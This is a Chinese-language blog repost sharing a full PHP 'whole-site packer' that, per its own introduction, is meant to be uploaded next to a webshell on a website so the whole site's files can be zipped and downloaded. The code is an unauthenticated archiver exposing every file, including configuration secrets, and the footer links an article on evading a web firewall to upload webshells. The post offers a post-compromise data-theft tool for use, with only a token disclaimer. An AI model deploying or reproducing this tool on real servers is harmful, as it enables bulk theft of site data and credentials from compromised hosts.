php版网站站打包程序配合webshell(原创)
Posted 圆柱模板
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php版网站站打包程序配合webshell(原创)相关的知识,希望对你有一定的参考价值。
因为大马只能下载一些单文件,无法下载文件夹里的文件,所以花费一些时间写了一个php脚本,打包全站数据,在此分享!切勿做违法事情!
使用方法:
1、将该程序上传到网站的目录下,如/zip.php ;
2、在浏览器中访问程序 http://www.xuetong365.com/zip.php ;
3、将出现上图所示界面,可按照提示说明进行相关的操作;
4、点击压缩,稍等片刻(根据网站数据量的大小等待的时间不同),即可压缩完成;
5、压缩完成后会显示压缩文件的下载地址,可选择在线下载也可以使用FTP进行下载;
代码:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>PHP整站打包程序</title> </head> <body> <form name="myform" method="post" action=""> <?php ini_set(\'memory_limit\', \'2048M\'); echo "选择要压缩的文件或目录:<br>"; $fdir = opendir(\'./\'); while ($file = readdir($fdir)) { if ($file == \'.\' || $file == \'..\') continue; echo "<input name=\'dfile[]\' type=\'checkbox\' value=\'$file\' " . ($file == basename(__FILE__) ? "" : "checked") . "> "; if (is_file($file)) { echo "<font face=\\"wingdings\\" size=\\"5\\">2</font> $file<br>"; } else { echo "<font face=\\"wingdings\\" size=\\"5\\">0</font> $file<br>"; } } ?> <br> 包含下列文件类型: <input name="file_type" type="text" id="file_type" value="" size="50"> <font color="red"> (文件类型用"|"隔开,默认空则包含任意文件,例:如果需要打包php和jpg文件,则输入"php|jpg") </font> <br> 压缩文件保存到目录: <input name="todir" type="text" id="todir" value="__dodo__" size="15"> <font color="red"> (留空为本目录,必须有写入权限) </font> <br> 压缩文件名称: <input name="zipname" type="text" id="zipname" value="dodo.zip" size="15"> <font color="red"> (.zip) </font> <br> <br> <input name="myaction" type="hidden" id="myaction" value="dozip"> <input type=\'button\' value=\'反选\' onclick=\'selrev();\'> <input type="submit" name="Submit" value=" 开始压缩 "> <script language=\'javascript\'> function selrev() { with(document.myform) { for(i=0;i<elements.length;i++) { thiselm = elements[i]; if(thiselm.name.match(/dfile\\[]/)) thiselm.checked = !thiselm.checked; } } } </script> <?php set_time_limit(0); class PHPzip { var $file_count = 0; var $datastr_len = 0; var $dirstr_len = 0; var $filedata = \'\'; //该变量只被类外部程序访问 var $gzfilename; var $fp; var $dirstr = \'\'; var $filefilters = array(); function SetFileFilter($filetype) { $this->filefilters = explode(\'|\', $filetype); } //返回文件的修改时间格式. //只为本类内部函数调用. function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray[\'year\'] < 1980) { $timearray[\'year\'] = 1980; $timearray[\'mon\'] = 1; $timearray[\'mday\'] = 1; $timearray[\'hours\'] = 0; $timearray[\'minutes\'] = 0; $timearray[\'seconds\'] = 0; } return (($timearray[\'year\'] - 1980) << 25) | ($timearray[\'mon\'] << 21) | ($timearray[\'mday\'] << 16) | ($timearray[\'hours\'] << 11) | ($timearray[\'minutes\'] << 5) | ($timearray[\'seconds\'] >> 1); } //初始化文件,建立文件目录, //并返回文件的写入权限. function startfile($path = \'dodo.zip\') { $this->gzfilename = $path; $mypathdir = array(); do { $mypathdir[] = $path = dirname($path); } while ($path != \'.\'); @end($mypathdir); do { $path = @current($mypathdir); @mkdir($path); } while (@prev($mypathdir)); if ($this->fp = @fopen($this->gzfilename, "w")) { return true; } return false; } //添加一个文件到 zip 压缩包中. function addfile($data, $name) { $name = str_replace(\'\\\\\', \'/\', $name); if (strrchr($name, \'/\') == \'/\') return $this->adddir($name); if (!empty($this->filefilters)) { if (!in_array(end(explode(".", $name)), $this->filefilters)) { return; } } $dtime = dechex($this->unix2DosTime()); $hexdtime = \'\\x\' . $dtime[6] . $dtime[7] . \'\\x\' . $dtime[4] . $dtime[5] . \'\\x\' . $dtime[2] . $dtime[3] . \'\\x\' . $dtime[0] . $dtime[1]; eval(\'$hexdtime = "\' . $hexdtime . \'";\'); $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); //新添文件内容格式化: $datastr = "\\x50\\x4b\\x03\\x04"; $datastr .= "\\x14\\x00"; // ver needed to extract $datastr .= "\\x00\\x00"; // gen purpose bit flag $datastr .= "\\x08\\x00"; // compression method $datastr .= $hexdtime; // last mod time and date $datastr .= pack(\'V\', $crc); // crc32 $datastr .= pack(\'V\', $c_len); // compressed filesize $datastr .= pack(\'V\', $unc_len); // uncompressed filesize $datastr .= pack(\'v\', strlen($name)); // length of filename $datastr .= pack(\'v\', 0); // extra field length $datastr .= $name; $datastr .= $zdata; $datastr .= pack(\'V\', $crc); // crc32 $datastr .= pack(\'V\', $c_len); // compressed filesize $datastr .= pack(\'V\', $unc_len); // uncompressed filesize fwrite($this->fp, $datastr); //写入新的文件内容 $my_datastr_len = strlen($datastr); unset($datastr); //新添文件目录信息 $dirstr = "\\x50\\x4b\\x01\\x02"; $dirstr .= "\\x00\\x00"; // version made by $dirstr .= "\\x14\\x00"; // version needed to extract $dirstr .= "\\x00\\x00"; // gen purpose bit flag $dirstr .= "\\x08\\x00"; // compression method $dirstr .= $hexdtime; // last mod time & date $dirstr .= pack(\'V\', $crc); // crc32 $dirstr .= pack(\'V\', $c_len); // compressed filesize $dirstr .= pack(\'V\', $unc_len); // uncompressed filesize $dirstr .= pack(\'v\', strlen($name)); // length of filename $dirstr .= pack(\'v\', 0); // extra field length $dirstr .= pack(\'v\', 0); // file comment length $dirstr .= pack(\'v\', 0); // disk number start $dirstr .= pack(\'v\', 0); // internal file attributes $dirstr .= pack(\'V\', 32); // external file attributes - \'archive\' bit set $dirstr .= pack(\'V\', $this->datastr_len); // relative offset of local header $dirstr .= $name; $this->dirstr .= $dirstr; //目录信息 $this->file_count++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function adddir($name) { $name = str_replace("\\\\", "/", $name); $datastr = "\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name)); $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0); fwrite($this->fp, $datastr); //写入新的文件内容 $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "\\x50\\x4b\\x01\\x02\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name)); $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . pack("v", 0); $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name; $this->dirstr .= $dirstr; //目录信息 $this->file_count++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function createfile() { //压缩包结束信息,包括文件总数,目录信息读取指针位置等信息 $endstr = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00" . pack(\'v\', $this->file_count) . pack(\'v\', $this->file_count) . pack(\'V\', $this->dirstr_len) . pack(\'V\', $this->datastr_len) . "\\x00\\x00"; fwrite($this->fp, $this->dirstr . $endstr); fclose($this->fp); } } //------------ 压缩开始. if (!trim($_REQUEST[zipname])) $_REQUEST[zipname] = "dodozip.zip"; else $_REQUEST[zipname] = trim($_REQUEST[zipname]); if (!strrchr(strtolower($_REQUEST[zipname]), \'.\') == \'.zip\') $_REQUEST[zipname] .= ".zip"; $_REQUEST[todir] = str_replace(\'\\\\\', \'/\', trim($_REQUEST[todir])); if (!strrchr(strtolower($_REQUEST[todir]), \'/\') == \'/\') $_REQUEST[todir] .= "/"; if ($_REQUEST[todir] == "/") $_REQUEST[todir] = "./"; function listfiles($dir = ".") //列出目录的文件 读入目录里面的文件 { global $dodozip; //全局 $sub_file_num = 0; if (is_file("$dir")) { if (realpath($dodozip->gzfilename) != realpath("$dir")) { $dodozip->addfile(implode(\'\', file("$dir")), "$dir"); //将文件读取出来,写个$dir命名文件夹 return 1; } return 0; } $handle = opendir("$dir"); while ($file = readdir($handle)) //打开句柄. { if ($file == "." || $file == "..") continue; if (is_dir("$dir/$file")) { $sub_file_num += listfiles("$dir/$file"); //递归读取 } else { if (realpath($dodozip->gzfilename) != realpath("$dir/$file")) { $dodozip->addfile(implode(\'\', file("$dir/$file")), "$dir/$file"); $sub_file_num++; } } } closedir($handle); if (!$sub_file_num) $dodozip->addfile("", "$dir/"); return $sub_file_num; } function num_bitunit($num) { $bitunit = array( \' B\', \' KB\', \' MB\', \' GB\' ); for ($key = 0; $key < count($bitunit); $key++) { if ($num >= pow(2, 10 * $key) - 1) { //1023B 会显示为 1KB $num_bitunit_str = (ceil($num / pow(2, 10 * $key) * 100) / 100) . " $bitunit[$key]"; } } return $num_bitunit_str; } if (is_array($_REQUEST[dfile])) { $dodozip = new PHPzip; if ($_REQUEST["file_type"] != NULL) $dodozip->SetFileFilter($_REQUEST["file_type"]); if ($dodozip->startfile("$_REQUEST[todir]$_REQUEST[zipname]")) { echo "正在添加压缩文件...<br><br>"; $filenum = 0; foreach ($_REQUEST[dfile] as $file) { if (is_file($file)) { if (!empty($dodozip->filefilters)) if (!in_array(end(explode(".", $file)), $dodozip->filefilters)) continue; echo "<font face=\\"wingdings\\" size=\\"5\\">2</font> $file<br>"; } else { echo "<font face=\\"wingdings\\" size=\\"5\\">0</font> $file<br>"; } $filenum += listfiles($file); //读取目录. } $dodozip->createfile(); echo "<br>压缩完成,共添加 $filenum 个文件.<br><a href=\'$_REQUEST[todir]$_REQUEST[zipname]\' _fcksavedurl=\'$_REQUEST[todir]$_REQUEST[zipname]\'>$_REQUEST[todir]$_REQUEST[zipname] (" . num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")) . ")</a>"; } else { echo "$_REQUEST[todir]$_REQUEST[zipname] 不能写入,请检查路径或权限是否正确.<br>"; } } ?> </form> <hr color="#003388"> </body> </html>
以上是关于php版网站站打包程序配合webshell(原创)的主要内容,如果未能解决你的问题,请参考以下文章
绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)